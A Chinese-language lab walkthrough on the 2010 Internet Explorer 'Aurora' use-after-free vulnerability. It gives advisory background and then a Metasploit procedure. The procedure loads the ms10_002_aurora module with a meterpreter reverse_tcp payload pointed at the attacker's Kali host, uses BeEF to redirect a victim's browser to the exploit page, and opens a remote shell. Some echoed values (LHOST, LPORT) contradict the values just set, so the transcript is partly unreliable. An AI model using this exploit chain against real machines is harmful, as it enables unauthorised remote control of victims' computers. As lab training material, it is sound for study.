漏洞介绍
- 1月20日,江民恶意网页监控系统监测到,上周五被确认的微软IE“极光漏洞”攻击代码已被黑客大面积利用,网上已出现数百个利用该漏洞的恶意网页,提醒广大电脑用户谨防遭受利用该漏洞的病毒攻击。
- 上周,微软官方发布了Microsoft Security Advisory (979352)安全公告,确认在IE6/7/8版本中,存在零日漏洞,涉及的操作系统包括:Windows 2000 SP4, Windows XP/2003/Vista/2008,Windows 7。微软在安全公告中表示,IE在特定情况下,有可能访问已经被释放的内存对象导致任意代码执行,该漏洞可以被用来进行网页挂马。该漏洞即后来被称为“Aurora”(极光)的零日漏洞。
- 微软官方发布的IE 0Day漏洞所影响的操作系统、浏览器版本:
(1)Windows 2000 SP4下的IE6浏览器,该操作系统,目前通常被通常为学校或者企业机构使用。
(2)Windows xp/Vista/Win7 系统下的IE6/IE7/IE8浏览器,大部分普通用户使用的操作系统版本。
(3)Windows Server 2003/2008/2008r2系统下的IE6/IE7/IE8浏览器,此操作系统版本多为网站管理员使用。
实验环境
kali虚拟机(beef+msf工具 ip:192.168.138.132)
win10物理机(web服务器)
winxp 目标(ie6)
步骤
- 打开msf
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
- 配置相关地址和端口,其中192.168.138.132是kali的ip地址
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.138.132
SRVHOST => 192.168.138.132
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.138.132
LHOST => 192.168.1.11
msf exploit(ms10_002_aurora) > set LPORT 4444
LPORT => 443
msf exploit(ms10_002_aurora) > exploit
- 启动后利用beef劫持客户端浏览器进行跳转(图片里面被圈住的url)
beef劫持步骤:https://darker.hellosmile.xin/2020/04/17/XSS篇-Beef实验一:劫持客户端浏览器/
- xp访问后如果有漏洞就会得到shell
session -i #获取上钩的计算机
session -i 1 #其中1是选择的id
shell #获取shell权限